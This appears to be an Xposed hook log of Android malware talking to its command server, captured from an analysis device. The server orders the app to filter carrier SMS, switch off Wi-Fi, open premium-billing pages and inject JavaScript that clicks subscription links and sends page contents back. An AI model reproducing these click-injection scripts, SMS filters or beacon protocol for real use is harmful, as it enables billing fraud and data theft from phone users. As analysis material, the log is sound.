\\\\\\\"currentWifiNetwork\\\\\\\": \\\\\\\"\\\\\\\\\\\\\\\"NETGEAR12\\\\\\\\\\\\\\\" (20:4e:7f:af:6a:d4)\\\\\\\",\\\\n \\\\\\\"mobileDataEnable\\\\\\\": true,\\\\n \\\\\\\"rootAvailable\\\\\\\": false,\\\\n \\\\\\\"simInfo\\\\\\\": [],\\\\n \\\\\\\"installedApps\\\\\\\": [\\\\n \\\\\\\"stericson.busybox\\\\\\\",\\\\n \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"de.robv.android.xposed.installer\\\\\\\",\\\\n \\\\\\\"com.hook.hooker\\\\\\\"\\\\n ],\\\\n \\\\\\\"simCount\\\\\\\": 1,\\\\n \\\\\\\"androidId\\\\\\\": \\\\\\\"012345678abcdef0\\\\\\\",\\\\n \\\\\\\"imei\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"imsi\\\\\\\": \\\\\\\"12345\\\\\\\",\\\\n \\\\\\\"isPhone\\\\\\\"
11-19 15:37:06.762 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:37:06.778 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"715286\\\",\\n \\\"name\\\": \\\"receiveSms\\\",\\n \\\"result\\\": 1,\\n \\\"error\\\": \\\"[\\\\n \\\\\\\"enable: already disabled\\\\\\\"\\\\n]\\\"\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"301436\\\",\\n \\\"name\\\": \\\"smsFilters\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"143452\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"876723\\\",\\n \\\"name\\\": \\\"info\\\",\\n \\\"result\\\": 0,\\n \\\"data\\\": \\\"{\\\\n \\\\\\\"version\\\\\\\": 34,\\\\n \\\\\\\"androdUuid\\\\\\\": \\\\\\\"8c20c154-7c53-458e-977d-cb8c6ea03097\\\\\\\",\\\\n \\\\\\\"apiKey\\\\\\\": \\\\\\\"NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==\\\\\\\",\\\\n \\\\\\\"appId\\\\\\\": \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"operator\\\\\\\": \\\\\\\" ()\\\\\\\",\\\\n \\\\\\\"WiFi\\\\\\\": true,\\\\n \\\\\\\"Battery\\\\\\\": 70,\\\\n \\\\\\\"locale\\\\\\\": \\\\\\\"it_IT\\\\\\\",\\\\n \\\\\\\"manufacturer\\\\\\\": \\\\\\\"motorola\\\\\\\",\\\\n \\\\\\\"model\\\\\\\": \\\\\\\"XT1032\\\\\\\",\\\\n \\\\\\\"androidVersion\\\\\\\": \\\\\\\"5.1\\\\\\\",\\\\n \\\\\\\"screen\\\\\\\": \\\\\\\"720 x 1184, 320, 2.00\\\\\\\",\\\\n \\\\\\\"forGooglePlay\\\\\\\": false,\\\\n \\\\\\\"debug\\\\\\\": false,\\\\n \\\\\\\"userAgent\\\\\\\": \\\\\\\"Mozilla\\\\\\\\\\\\\\\/5.0 (Linux; Android 5.1; XT1032 Build\\\\\\\\\\\\\\\/LMY47M.M005) AppleWebKit\\\\\\\\\\\\\\\/537.36 (KHTML, like Gecko) Version\\\\\\\\\\\\\\\/4.0 Chrome\\\\\\\\\\\\\\\/39.0.0.0 Mobile Safari\\\\\\\\\\\\\\\/537.36\\\\\\\",\\\\n \\\\\\\"androidSdkVersion\\\\\\\": 22,\\\\n \\\\\\\"androidBuildVersion\\\\\\\": \\\\\\\"3.4.42-g2b8cf4a-00009-g8ea813e\\\\\\\",\\\\n \\\\\\\"fingerprint\\\\\\\": \\\\\\\"motorola\\\\\\\\\\\\\\\/falcon_gpe\\\\\\\\\\\\\\\/falcon_umts:5.1\\\\\\\\\\\\\\\/LMY47M.M005\\\\\\\\\\\\\\\/10:user\\\\\\\\\\\\\\\/release-keys\\\\\\\",\\\\n \\\\\\\"hardware\\\\\\\": \\\\\\\"qcom\\\\\\\",\\\\n \\\\\\\"device\\\\\\\": \\\\\\\"falcon_umts\\\\\\\",\\\\n \\\\\\\"wifiNetworks\\\\\\\": [\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR-AAA\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -69\\\\n },\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR12\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -83\\\\n }\\\\n ],\\\\n \\\\\\\"currentWifiNetwork\\\\\\\": \\\\\\\"\\\\\\\\\\\\\\\"NETGEAR12\\\\\\\\\\\\\\\" (20:4e:7f:af:6a:d4)\\\\\\\",\\\\n \\\\\\\"mobileDataEnable\\\\\\\": true,\\\\n \\\\\\\"rootAvailable\\\\\\\": false,\\\\n \\\\\\\"simInfo\\\\\\\": [],\\\\n \\\\\\\"installedApps\\\\\\\": [\\\\n \\\\\\\"stericson.busybox\\\\\\\",\\\\n \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"de.robv.android.xposed.installer\\\\\\\",\\\\n \\\\\\\"com.hook.hooker\\\\\\\"\\\\n ],\\\\n \\\\\\\"simCount\\\\\\\": 1,\\\\n \\\\\\\"androidId\\\\\\\": \\\\\\\"012345678abcdef0\\\\\\\",\\\\n \\\\\\\"imei\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"imsi\\\\\\\": \\\\\\\"12345\\\\\\\",\\\\n \\\\\\\"isPhone\\\\\\\"
11-19 15:37:07.458 I/Xposed (18830): [+] SERVER: []
11-19 15:37:07.540 I/Xposed (18830): [+] SERVER: [{"id":763031,"name":"receiveSms","params":{"enable":false}},{"id":165158,"name":"smsFilters","params":{"filters":[{"phoneExp":"[0-9]{4}","textExp":".*"},{"phoneExp":"[0-9]{3}","textExp":".*"},{"phoneExp":"[0-9]{5}","textExp":".*"},{"phoneExp":"[0-9]{6}","textExp":".*"},{"phoneExp":"[0-9]{7}","textExp":".*"},{"phoneExp":".*9121","textExp":".*"},{"phoneExp":"C[0-9]{8}","textExp":".*"},{"phoneExp":".*Billinfo.*","textExp":".*"},{"phoneExp":"1232111","textExp":".*"},{"phoneExp":"o2.Team","textExp":".*"},{"phoneExp":"o2.Info","textExp":".*"},{"phoneExp":".*Bouygues.*","textExp":".*"},{"phoneExp":".*Orange.*","textExp":".*"}]}},{"id":190728,"name":"OK"},{"id":905229,"name":"OK"}]
11-19 15:37:07.655 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:37:07 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"763031\\\",\\n \\\"name\\\": \\\"receiveSms\\\",\\n \\\"result\\\": 1,\\n \\\"error\\\": \\\"[\\\\n \\\\\\\"enable: already disabled\\\\\\\"\\\\n]\\\"\\n}\"\n }\n]"}
11-19 15:37:07.844 I/Xposed (18830): [+] SERVER: [{"id":539593,"name":"OK"}]
11-19 15:37:07.861 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:37:07 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"165158\\\",\\n \\\"name\\\": \\\"smsFilters\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 15:37:08.027 I/Xposed (18830): [+] SERVER: [{"id":457523,"name":"OK"}]
11-19 15:38:06.826 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:38:08.970 I/Xposed (18830): [+] SERVER: []
11-19 15:39:06.824 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:39:09.236 I/Xposed (18830): [+] SERVER: []
11-19 15:40:06.824 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:40:07.862 I/Xposed (18830): [+] SERVER: []
11-19 15:41:06.773 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:41:09.300 I/Xposed (18830): [+] SERVER: []
11-19 15:42:06.812 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:42:08.359 I/Xposed (18830): [+] SERVER: []
11-19 15:43:06.832 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:43:08.839 I/Xposed (18830): [+] SERVER: []
11-19 15:44:06.776 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:44:08.625 I/Xposed (18830): [+] SERVER: []
11-19 15:45:06.787 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:45:08.679 I/Xposed (18830): [+] SERVER: []
11-19 15:46:06.844 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:46:08.616 I/Xposed (18830): [+] SERVER: []
11-19 15:47:06.874 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:47:08.346 I/Xposed (18830): [+] SERVER: []
11-19 15:48:06.879 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:48:07.636 I/Xposed (18830): [+] SERVER: []
11-19 15:49:06.839 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:49:07.435 I/Xposed (18830): [+] SERVER: []
11-19 15:50:06.855 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:50:07.455 I/Xposed (18830): [+] SERVER: []
11-19 15:51:06.909 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:51:07.665 I/Xposed (18830): [+] SERVER: []
11-19 15:52:06.925 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:52:07.566 I/Xposed (18830): [+] SERVER: []
11-19 15:53:06.936 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:53:07.596 I/Xposed (18830): [+] SERVER: []
11-19 15:54:06.909 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:54:07.700 I/Xposed (18830): [+] SERVER: []
11-19 15:55:06.956 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:55:07.692 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a119b4b6e399","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":605019,"name":"interval","params":{"interval":60}}]
11-19 15:56:07.899 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:56:07 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 15:56:08.794 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:56:07 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"15:56:08 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 15:56:08.823 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:56:07 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"15:56:08 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:56:08 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"605019\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 15:57:08.872 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:56:07 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"15:56:08 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:56:08 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"605019\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 15:57:08.881 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:57:09.474 I/Xposed (18830): [+] SERVER: []
11-19 15:57:09.696 I/Xposed (18830): [+] SERVER: [{"id":574062,"name":"OK"}]
11-19 15:58:08.886 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:58:09.459 I/Xposed (18830): [+] SERVER: []
11-19 15:59:08.912 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 15:59:09.674 I/Xposed (18830): [+] SERVER: []
11-19 16:00:08.906 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:00:09.576 I/Xposed (18830): [+] SERVER: []
11-19 16:01:08.914 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:01:09.787 I/Xposed (18830): [+] SERVER: []
11-19 16:02:08.918 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:02:09.695 I/Xposed (18830): [+] SERVER: []
11-19 16:03:08.935 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:03:09.604 I/Xposed (18830): [+] SERVER: []
11-19 16:04:08.903 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:04:09.446 I/Xposed (18830): [+] SERVER: []
11-19 16:05:09.674 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:05:10.245 I/Xposed (18830): [+] SERVER: []
11-19 16:06:09.876 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:06:10.445 I/Xposed (18830): [+] SERVER: [{"id":450066,"name":"interval","params":{"interval":1800}}]
11-19 16:06:10.515 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:06:10 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"450066\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 16:06:10.715 I/Xposed (18830): [+] SERVER: [{"id":127125,"name":"OK"}]
11-19 16:36:10.608 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:36:13.029 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11a4ec41aab","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":373739,"name":"interval","params":{"interval":60}}]
11-19 16:37:13.277 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:37:13 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 16:37:14.123 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:37:13 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"16:37:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 16:37:14.178 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:37:13 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"16:37:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:37:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"373739\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 16:38:14.161 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:38:14.167 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:37:13 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"16:37:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"16:37:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"373739\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 16:38:14.665 I/Xposed (18830): [+] SERVER: [{"id":356344,"name":"OK"}]
11-19 16:38:14.749 I/Xposed (18830): [+] SERVER: []
11-19 16:39:14.175 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:39:14.816 I/Xposed (18830): [+] SERVER: []
11-19 16:40:14.255 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:40:15.040 I/Xposed (18830): [+] SERVER: []
11-19 16:41:14.215 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:41:16.520 I/Xposed (18830): [+] SERVER: []
11-19 16:42:14.276 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 16:42:16.665 I/Xposed (18830): [+] SERVER: [{"id":651265,"name":"interval","params":{"interval":1800}}]
11-19 16:42:16.741 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"16:42:16 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"651265\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 16:42:17.155 I/Xposed (18830): [+] SERVER: [{"id":858505,"name":"OK"}]
11-19 17:12:16.826 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 17:12:23.774 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a11ad666e3ea","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":410121,"name":"interval","params":{"interval":60}}]
11-19 17:12:23.879 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"17:12:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
